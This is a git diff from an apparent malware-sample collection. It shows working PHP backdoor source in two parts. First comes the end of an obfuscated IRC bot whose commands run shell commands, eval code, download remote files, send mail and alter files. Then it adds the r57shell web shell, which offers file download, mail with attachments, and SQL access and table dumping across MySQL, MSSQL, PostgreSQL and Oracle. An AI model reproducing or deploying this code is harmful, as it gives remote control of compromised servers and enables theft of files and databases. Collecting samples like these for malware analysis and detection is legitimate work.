\2".$s954eef6d6eac5."\2"); +} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8=") . " \2".$s954eef6d6eac5."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZGlyIQ==")); +} break; case j69923efad5b7a("p5Wp"): if (count($xdfff0a7fa1a55) > 1) { if (is_file($xdfff0a7fa1a55[1])) { +if (($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[1],"r"))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$xdfff0a7fa1a55[1]."\2"); +while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256)); zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d"); +sleep(1); } zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ==")); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$xdfff0a7fa1a55[1]."\2 for reading."); +} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8=") . " \2".$xdfff0a7fa1a55[1]."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZmlsZQ==")); +} } break; case j69923efad5b7a("tKuZ"): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd()); +break; case j69923efad5b7a("p5g="): if (count($xdfff0a7fa1a55) > 1) { if (chdir($xdfff0a7fa1a55[1])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$xdfff0a7fa1a55[1]); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==")); +} } break; case j69923efad5b7a("tqE="): if (count($xdfff0a7fa1a55) > 1) { if (unlink($xdfff0a7fa1a55[1])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("uKOqlZs="): if (count($xdfff0a7fa1a55) > 1) { if (touch($xdfff0a7fa1a55[1])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("t62inpySoA=="): if (count($xdfff0a7fa1a55) > 2) { if (symlink($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("p5ykqaE="): if (count($xdfff0a7fa1a55) > 2) { if (chown($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2"); +} } break; case j69923efad5b7a("p5yioZc="): if (count($xdfff0a7fa1a55) > 2) { if(chmod($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$xdfff0a7fa1a55[1]."\2 with permissions \2".$xdfff0a7fa1a55[2]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("sZ+Zm6U="): if (count($xdfff0a7fa1a55) > 1) { if (mkdir($xdfff0a7fa1a55[1])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("tqGZm6U="): if (count($xdfff0a7fa1a55)>1) { if (rmdir($xdfff0a7fa1a55[1])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2"); +} } break; case j69923efad5b7a("p6Q="): if (count($xdfff0a7fa1a55) > 2) { if (copy($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[2])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2"); +} } break; case j69923efad5b7a("sZWeng=="): if (count($xdfff0a7fa1a55)>4) { $z099fb995346f3 = "From: <".$xdfff0a7fa1a55[2].">\r\n"; +if (mail($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[3], substr($o78e731027d8fd,$xdfff0a7fa1a55[4]), $z099fb995346f3)) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$xdfff0a7fa1a55[1]."\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Send failure"); +} } break; case j69923efad5b7a("sZ+ilmg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUQ1Ly8=") . " ".md5($xdfff0a7fa1a55[1])); +break; case j69923efad5b7a("qKKo"): if (isset($xdfff0a7fa1a55[1])) { $g957b527bcfbad = explode(".",$xdfff0a7fa1a55[1]); +if (count($g957b527bcfbad)==4 && is_numeric($g957b527bcfbad[0]) && is_numeric($g957b527bcfbad[1]) && is_numeric($g957b527bcfbad[2]) && is_numeric($g957b527bcfbad[3])) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyaddr($xdfff0a7fa1a55[1])); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyname($xdfff0a7fa1a55[1])); +} } break; case j69923efad5b7a("tpmoppSWqQ=="): i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UVVJVCA6UVVJVC4uLg==")); +fclose($o351a1d2ad68bc); dfc35fdc70d5fc(); break; case j69923efad5b7a("tqI="): if(isset($xdfff0a7fa1a55[1])) { +$d8052146769b14 = bd988971435842((int)$xdfff0a7fa1a55[1]); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); +} else { $d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); +} break; case j69923efad5b7a("tJyl"): if (count($xdfff0a7fa1a55) > 1) { eval(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0]))); +} break; case j69923efad5b7a("q5mp"): if (count($xdfff0a7fa1a55) > 2) { if (!($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[2],"w"))) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=")); +} else { if (!($db5eda0a74558a = file($xdfff0a7fa1a55[1]))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I=")); +} else { for ($v865c0c0b4ab0e = 0; $v865c0c0b4ab0e < count($db5eda0a74558a); $v865c0c0b4ab0e++) { fwrite($a0666f0acdeed3,$db5eda0a74558a[$v865c0c0b4ab0e]); +} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8=") . " \2".$xdfff0a7fa1a55[1]."\2 downloaded to \2".$xdfff0a7fa1a55[2]."\2"); +} fclose($a0666f0acdeed3); } } break; case j69923efad5b7a("sp0="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']); +break; case j69923efad5b7a("t50="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]"); +break; case j69923efad5b7a("tKOnpqKUmuw="): if (isset($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { if (fsockopen($xdfff0a7fa1a55[1],(int)$xdfff0a7fa1a55[2],$f56bd7107802eb,$p341be97d9aff9,5)) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Open\2"); +} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Closed\2"); +} } break; case j69923efad5b7a("uaKWn5g="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VW5hbWUvLw==")." " .php_uname()); +break; case j69923efad5b7a("rZg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("SUQvLw==")." ".getmypid()); +break; case j69923efad5b7a("p6GZ"): if (count($xdfff0a7fa1a55)>1) { $z1dccadfed7bcb = popen(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])),"r"); +while (!feof($z1dccadfed7bcb)) { $l734515cbd3636 = trim(fgets($z1dccadfed7bcb,512)); if (strlen($l734515cbd3636)>0) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> ".$l734515cbd3636); sleep(1); } +} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ==")); +} break; case j69923efad5b7a("p6GZZA=="): if (count($xdfff0a7fa1a55)>1) { $c2beda901e9726 = tempnam('/tmp', 'tmpfile'); +$z1dccadfed7bcb = substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])); $z1dccadfed7bcb .= " >$c2beda901e9726"; +$e3c0f0406c38df = "rm $c2beda901e9726"; r54d54a126a783($z1dccadfed7bcb); if (is_file($c2beda901e9726)) { +if (($a0666f0acdeed3 = fopen($c2beda901e9726,"r"))) { while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256)); +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d"); sleep(1); } +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ==")); } else { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gQ291bGRuJ3Qgb3BlbiB0bXBmaWxlLg==")); +} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gdG1wZmlsZSBpcyBub3QgYSBmaWxl")); +} r54d54a126a783($e3c0f0406c38df); } break; case j69923efad5b7a("qayalaiYmg=="): r54d54a126a783(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0]))); +break; } } else { switch(substr($xdfff0a7fa1a55[0],1)) { case j69923efad5b7a("bg=="): if (isset($xdfff0a7fa1a55[1]) && md5($xdfff0a7fa1a55[1]) == ef9feaa9bcab30($oec12e0af93cb5['pa']) && preg_match(ef9feaa9bcab30($oec12e0af93cb5['ha']),$z67b3dba8bc677)) { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UmVhZHkvLyBPaw==")); +$xee11cbb19052e[$z67b3dba8bc677] = TRUE; } else { zf2f4e964f79d0($o351a1d2ad68bc, FALSE, ef9feaa9bcab30($oec12e0af93cb5['ch']), ub5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA==")); +} break; } } } } $ed707b8140a662 = $l7fabc1404929c; } fclose($o351a1d2ad68bc); sleep(3); dfc35fdc70d5fc(); +} else { shuffle($n59b514174bffe); dfc35fdc70d5fc(); } } function i56eacb300613d($k317d37b0edc7b, $o78e731027d8fd) { +fwrite($k317d37b0edc7b,"$o78e731027d8fd\r\n"); } function zf2f4e964f79d0($k317d37b0edc7b, $e73be252ca8221, $i01b6e20344b68, $o78e731027d8fd) { +if($e73be252ca8221 != TRUE) { i56eacb300613d($k317d37b0edc7b, ub5d21085bf2c0("UFJJVk1TRw==")." $i01b6e20344b68 :$o78e731027d8fd"); +} } function j69923efad5b7a($mc7a1ddb19daba) { $db4a88417b3d01 = ''; $mc7a1ddb19daba = base64_decode($mc7a1ddb19daba); +for($v865c0c0b4ab0e=0; $v865c0c0b4ab0e \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.aj b/PHP/Backdoor.PHP.Agent.aj new file mode 100644 index 00000000..16145333 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.aj @@ -0,0 +1,2208 @@ + +$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="r57shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("r57shell : Access Denied"); + } +} +$head = ' + + +r57shell + + + +'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
    [ BACK ]
    "; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo ''; + if(!$sql->connect()) echo "
    Can't connect to SQL server
    "; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "
    Can't select database
    "; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
    "; + switch($sql->query($query)) + { + case '0': + echo "
    Error : ".$sql->error."
    "; + break; + case '1': + if($sql->get_result()) + { + echo ""; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode(" "; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode(" '; + } + echo "
     ", $sql->columns); + echo "
     ".$keys." 
     ",$sql->rows[$i]); + echo '
     '.$values.' 
    "; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "
    affected rows : ".$ar."

    "; + break; + } + } + } + } + } + echo "
